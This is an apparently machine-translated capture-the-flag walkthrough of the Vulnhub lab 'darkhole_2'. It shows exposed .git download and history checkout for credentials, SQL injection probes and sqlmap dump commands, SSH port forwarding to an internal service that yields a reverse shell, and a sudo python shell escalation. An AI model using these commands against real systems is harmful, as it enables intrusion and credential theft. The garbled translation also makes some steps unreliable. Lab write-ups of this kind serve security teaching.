当前位置:网站首页>Vulnhub's darkhole_ two
Vulnhub's darkhole_ two
2022-07-05 18:13:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
3. Generate the latest version of source code
4. Check the version with loopholes
Nine 、losy information gathering
11、 ... and 、hydra Brute force
One 、 The host found
Two 、 Port scanning
3、 ... and 、 Service version discovery
What is worth noting here is .git, This is the source code also put up . The others are the same .
Four 、 information gathering
1. Home page
A picture on the homepage , There is nothing in the source code .
There's a login interface .
2. Scan directory
Most of the useful information points to .git, This is the same as the information we collected above
5、 ... and 、.git
Be careful : It is best to 2021 Version of kali,2022 the latest version git clone Will report a mistake , I don't know why
1. download .git
wget -r http://192.168.0.108/.git/
2. View version history
3. Generate the latest version of source code
git clone . backup
Login in the source code php in , We can see that the input parameters are escaped here , Prevent injection
4. Check the version with loopholes
Here, when converting branches , Sometimes you have to do it first
git stash
Transform branch
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
Enter the view , Got the account password used in the previous version . It is likely that the account password of the previous version can be used for login in this version
5. Sign in
6、 ... and 、sqlmap Inject
1' No echo results .
1'and+1=1--+ and 1 The output is the same .
Prove that there is sql Inject ,sqlmap Run
burp Grab the bag ,
(1) Run to the library
sqlmap -r ~/Desktop/1 --dbs
Four default libraries , One darkhole_2
(2) Running Watch
(3)dump Come down
ssh:
users:
7、 ... and 、ssh Sign in
1.
Got one jehad Of shell.
In information collection , We see .bash_history There are many tips in . Here is a hint , Make one Port forwarding , Then execute the command .
2.9999 Port service information
Content :
ps -aux | grep 9999
You can see that the program is based on losy Running , We use him to execute the rebound shell And then I got a losy Of shell
8、 ... and 、 Port forwarding
Why do I do this port forwarding , Because we are kali The target target cannot be accessed by the client 9999 Service script for port deployment .
there 127.0.0.1 As a target ( Remote target ) The address of .
Of course, in fact, we can directly use what we get jehad This user , Execute commands locally .
1.kali End
ssh -L 9633:127.0.0.1:9999 [email protected]
After the port forwarding, we can kali The end implements the command execution operation .
2. rebound shell
stay .bash_history In fact, it provides us with several rebounds shell The way , In fact, it is several ways that hackers try to invade , But it seems to be useless
Conduct url code :
Successfully rebound after submission .
Nine 、losy information gathering
upgrade shell, The password has been told to us
Ten 、sudo Raise the right
Use the one given above python Command line
sudo python3 -c 'import os; os.system("/bin/sh")'
11、 ... and 、hydra Brute force
lama Too much authority , The password is too simple .
Log in and use sudo Raise the right
边栏推荐
- 隐私计算助力数据的安全流通与共享
- 《力扣刷题计划》复制带随机指针的链表
- 在一台服务器上部署多个EasyCVR出现报错“Press any to exit”,如何解决?
- Privacy computing helps secure data circulation and sharing
- 消除`if()else{ }`写法
- nacos -分布式事务-Seata** linux安装jdk ,mysql5.7启动nacos配置ideal 调用接口配合 (保姆级细节教程)
- 记一次使用Windbg分析内存“泄漏”的案例
- 《2022中国信创生态市场研究及选型评估报告》发布 华云数据入选信创IT基础设施主流厂商!
- Use JMeter to record scripts and debug
- vulnhub之darkhole_2
猜你喜欢
node_ Exporter memory usage is not displayed
记录Pytorch中的eval()和no_grad()
Image classification, just look at me!
Sophon CE Community Edition is online, and free get is a lightweight, easy-to-use, efficient and intelligent data analysis tool
Le cours d'apprentissage de la machine 2022 de l'équipe Wunda arrive.
分享:中兴 远航 30 pro root 解锁BL magisk ZTE 7532N 8040N 9041N 刷机 刷面具原厂刷机包 root方法下载
RSE2020/云检测:基于弱监督深度学习的高分辨率遥感图像精确云检测
华夏基金:基金行业数字化转型实践成果分享
吴恩达团队2022机器学习课程,来啦
"Xiaodeng in operation and maintenance" is a single sign on solution for cloud applications
随机推荐
[JMeter] advanced writing method of JMeter script: all variables, parameters (parameters can be configured by Jenkins), functions, etc. in the interface automation script realize the complete business
苹果手机炒股安全吗?打新债是骗局吗?
瀚升优品app翰林优商系统开发功能介绍
[performance test] full link voltage test
南京大学:新时代数字化人才培养方案探讨
让更多港澳青年了解南沙特色文创产品!“南沙麒麟”正式亮相
[PM2 details]
ClickHouse(03)ClickHouse怎么安装和部署
Record eval() and no in pytoch_ grad()
Huaxia Fund: sharing of practical achievements of digital transformation in the fund industry
IDC report: Tencent cloud database ranks top 2 in the relational database market!
【PaddleClas】常用命令
How to solve the error "press any to exit" when deploying multiple easycvr on one server?
从XML架构生成类
ISPRS2022/云检测:Cloud detection with boundary nets基于边界网的云检测
分享:中兴 远航 30 pro root 解锁BL magisk ZTE 7532N 8040N 9041N 刷机 刷面具原厂刷机包 root方法下载
Star Ring Technology launched transwarp Navier, a data element circulation platform, to help enterprises achieve secure data circulation and collaboration under privacy protection
[use electron to develop desktop on youqilin]
vulnhub之darkhole_2
What is the reason why the video cannot be played normally after the easycvr access device turns on the audio?